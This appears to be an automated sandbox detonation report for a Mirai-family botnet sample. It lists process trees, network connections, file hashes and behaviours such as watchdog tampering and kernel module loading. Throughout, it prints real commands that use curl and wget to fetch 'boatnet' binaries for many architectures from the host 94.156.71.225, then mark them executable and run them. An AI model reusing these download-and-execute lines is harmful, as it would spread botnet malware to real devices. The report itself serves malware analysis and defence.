[chmod +x WTF boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86_64]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:3778 | tcp |
Files
/tmp/boatnet.x86
| MD5 | ba2cb5b8715ba94c39e24e75a34d0ea0 |
| SHA1 | 7182bf3b0e14e5224e741c15174c6e93f00df444 |
| SHA256 | 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33 |
| SHA512 | 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d |
memory/1585-1-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1594-2-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1604-3-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1613-4-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1622-5-0x0000000008048000-0x000000000805ce08-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-31 21:05
Reported
2024-08-31 21:06
Platform
debian12-armhf-20240418-en
Max time kernel
60s
Max time network
63s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]
/usr/bin/cat
[cat boatnet.x86]
/usr/bin/chmod
[chmod +x boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-timedated.service-qtJorK WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]
/usr/bin/cat
[cat boatnet.mips]
/usr/bin/chmod
[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arc]
/usr/bin/cat
[cat boatnet.arc]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i468]
/usr/bin/cat
[cat boatnet.i468]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i686]
/usr/bin/cat
[cat boatnet.i686]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64]
/usr/bin/cat
[cat boatnet.x86_64]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl]
Network
| Country | Destination | Domain | Proto |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| US | 1.1.1.1:53 | debian12-armhf-20240418-en-3 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240418-en-3 | udp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| US | 1.1.1.1:53 | debian12-armhf-20240418-en-3 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240418-en-3 | udp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
Files
/tmp/boatnet.x86
| MD5 | ba2cb5b8715ba94c39e24e75a34d0ea0 |
| SHA1 | 7182bf3b0e14e5224e741c15174c6e93f00df444 |
| SHA256 | 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33 |
| SHA512 | 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d |
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-31 21:05
Reported
2024-08-31 21:06
Platform
debian12-mipsel-20240729-en
Max time kernel
61s
Max time network
67s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates running processes
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/30/status | /tmp/WTF | N/A |
| File opened for reading | /proc/16/status | /tmp/WTF | N/A |
| File opened for reading | /proc/847/status | /tmp/WTF | N/A |
| File opened for reading | /proc/698/status | /tmp/WTF | N/A |
| File opened for reading | /proc/6/status | /tmp/WTF | N/A |
| File opened for reading | /proc/698/status | /tmp/WTF | N/A |
| File opened for reading | /proc/405/status | /tmp/WTF | N/A |
| File opened for reading | /proc/858/status | /tmp/WTF | N/A |
| File opened for reading | /proc/829/status | /tmp/WTF | N/A |
| File opened for reading | /proc/2/status | /tmp/WTF | N/A |
| File opened for reading | /proc/11/status | /tmp/WTF | N/A |
| File opened for reading | /proc/28/status | /tmp/WTF | N/A |
| File opened for reading | /proc/23/status | /tmp/WTF | N/A |
| File opened for reading | /proc/31/status | /tmp/WTF | N/A |
| File opened for reading | /proc/15/status | /tmp/WTF | N/A |
| File opened for reading | /proc/866/status | /tmp/WTF | N/A |
| File opened for reading | /proc/11/status | /tmp/WTF | N/A |
| File opened for reading | /proc/695/status | /tmp/WTF | N/A |
| File opened for reading | /proc/868/status | /tmp/WTF | N/A |
| File opened for reading | /proc/869/status | /tmp/WTF | N/A |
| File opened for reading | /proc/33/status | /tmp/WTF | N/A |
| File opened for reading | /proc/675/status | /tmp/WTF | N/A |
| File opened for reading | /proc/118/status | /tmp/WTF | N/A |
| File opened for reading | /proc/111/status | /tmp/WTF | N/A |
| File opened for reading | /proc/751/status | /tmp/WTF | N/A |
| File opened for reading | /proc/843/status | /tmp/WTF | N/A |
| File opened for reading | /proc/392/status | /tmp/WTF | N/A |
| File opened for reading | /proc/27/status | /tmp/WTF | N/A |
| File opened for reading | /proc/112/status | /tmp/WTF | N/A |
| File opened for reading | /proc/663/status | /tmp/WTF | N/A |
| File opened for reading | /proc/53/status | /tmp/WTF | N/A |
| File opened for reading | /proc/5/status | /tmp/WTF | N/A |
| File opened for reading | /proc/885/status | /tmp/WTF | N/A |
| File opened for reading | /proc/24/status | /tmp/WTF | N/A |
| File opened for reading | /proc/843/status | /tmp/WTF | N/A |
| File opened for reading | /proc/10/status | /tmp/WTF | N/A |
| File opened for reading | /proc/837/status | /tmp/WTF | N/A |
| File opened for reading | /proc/34/status | /tmp/WTF | N/A |
| File opened for reading | /proc/35/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1/status | /tmp/WTF | N/A |
| File opened for reading | /proc/827/status | /tmp/WTF | N/A |
| File opened for reading | /proc/25/status | /tmp/WTF | N/A |
| File opened for reading | /proc/862/status | /tmp/WTF | N/A |
| File opened for reading | /proc/875/status | /tmp/WTF | N/A |
| File opened for reading | /proc/392/status | /tmp/WTF | N/A |
| File opened for reading | /proc/840/status | /tmp/WTF | N/A |
| File opened for reading | /proc/674/status | /tmp/WTF | N/A |
| File opened for reading | /proc/53/status | /tmp/WTF | N/A |
| File opened for reading | /proc/698/status | /tmp/WTF | N/A |
| File opened for reading | /proc/17/status | /tmp/WTF | N/A |
| File opened for reading | /proc/35/status | /tmp/WTF | N/A |
| File opened for reading | /proc/113/status | /tmp/WTF | N/A |
| File opened for reading | /proc/59/status | /tmp/WTF | N/A |
| File opened for reading | /proc/675/status | /tmp/WTF | N/A |
| File opened for reading | /proc/675/status | /tmp/WTF | N/A |
| File opened for reading | /proc/24/status | /tmp/WTF | N/A |
| File opened for reading | /proc/30/status | /tmp/WTF | N/A |
| File opened for reading | /proc/833/status | /tmp/WTF | N/A |
| File opened for reading | /proc/7/status | /tmp/WTF | N/A |
| File opened for reading | /proc/16/status | /tmp/WTF | N/A |
| File opened for reading | /proc/9/status | /tmp/WTF | N/A |
| File opened for reading | /proc/840/status | /tmp/WTF | N/A |
| File opened for reading | /proc/837/status | /tmp/WTF | N/A |
| File opened for reading | /proc/870/status | /tmp/WTF | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/curl | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]
/usr/bin/cat
[cat boatnet.x86]
/usr/bin/chmod
[chmod +x boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-timedated.service-9uBzHH WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]
/usr/bin/cat
[cat boatnet.mips]
/usr/bin/chmod
[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arc]
/usr/bin/cat
[cat boatnet.arc]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i468]
/usr/bin/cat
[cat boatnet.i468]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i686]
/usr/bin/cat
[cat boatnet.i686]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64]
/usr/bin/cat
[cat boatnet.x86_64]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl]
/usr/bin/cat
[cat boatnet.mpsl]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm5]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm6]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm7]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.ppc]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.spc]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.m68k]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| US | 1.1.1.1:53 | debian12-mipsel-20240729-en-7 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240729-en-7 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240729-en-7 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240729-en-7 | udp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
Files
/tmp/boatnet.x86
| MD5 | ba2cb5b8715ba94c39e24e75a34d0ea0 |
| SHA1 | 7182bf3b0e14e5224e741c15174c6e93f00df444 |
| SHA256 | 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33 |
| SHA512 | 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d |
memory/826-1-0x00400000-0x0043bfb4-memory.dmp
memory/836-2-0x00400000-0x0043bfb4-memory.dmp
memory/846-3-0x00400000-0x0043bfb4-memory.dmp
memory/855-4-0x00400000-0x0043bfb4-memory.dmp
memory/865-5-0x00400000-0x0043bfb4-memory.dmp
memory/874-6-0x00400000-0x0043bfb4-memory.dmp
memory/884-7-0x00400000-0x0043bfb4-memory.dmp
memory/895-8-0x00400000-0x0043bfb4-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-08-31 21:05
Reported
2024-08-31 21:06
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
60s
Max time network
64s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Loads a kernel module
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
